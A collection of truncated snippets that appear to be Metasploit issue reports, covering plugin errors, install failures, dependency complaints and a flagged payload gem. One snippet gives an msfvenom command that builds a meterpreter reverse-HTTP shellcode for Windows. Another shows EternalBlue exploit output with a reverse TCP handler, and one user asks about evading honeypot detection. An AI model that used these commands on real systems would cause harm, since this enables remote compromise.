-
hello, i'm trying to use metassh but it seems i'm getting issues, thanks
msf > load meta_ssh
[+] Added 2 Exploit modules for metaSSH
[*] Successfully loaded plugin: metaSSH
msf > use multi/ssh/login_…
-
## Steps to reproduce
1. Created shellcode with msfvenom (msfvenom -p windows/x64/meterpreter/reverse_http EXITFUNC=thread LPORT=24601 LHOST=10.0.0.11 -f raw -o shellcode.bin)
2. Injected it t…
-
After install Metasploit an run the command msfconsole.
msfconsole
/data/data/com.termux/files/usr/bin/env: ‘ruby’: No such file or directory
Please help
Best regards
-
[*] Started reverse TCP handler on 192.168.43.80:4444
[*] 192.168.43.3:445 - Generating Eternalblue XML data
cp: cannot stat '/root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.Skeleto…
-
When i run a metasploit scan against my IP, it easily detects this as a Kippo honeypot.
Any way i can get past this? As i get multiple connections, detected honeypot and disconnects..
-
```
msf development is too fast and too inconsistent.
For example, the current latest and the greatest version requires an outdated
version of simplecov (= 0.5.4)
In future, it will require ruby 2.…
-
```
When I lowered my exploit ranks to poor, this issue came up on my prompt;
[-] Metasploit Framework Exception: Invalid Module
[lib/msf/core/rpc/v10/rpc_base.rb:16:in `error',
lib/msf/core/rpc/v10/…
-
```
Everytime someone updates msf, it overwrites the database config for the user.
This is very annoying.
We should either config_protect it of remove the file and put an example
instead.
File is /…
-
```
When I lowered my exploit ranks to poor, this issue came up on my prompt;
[-] Metasploit Framework Exception: Invalid Module
[lib/msf/core/rpc/v10/rpc_base.rb:16:in `error',
lib/msf/core/rpc/v10/…
-
## Is your feature request related to a problem?
Yes. As described at length in https://github.com/rapid7/metasploit-payloads/issues/650, the metasploit-payloads gem has been flagged by the Google Sa…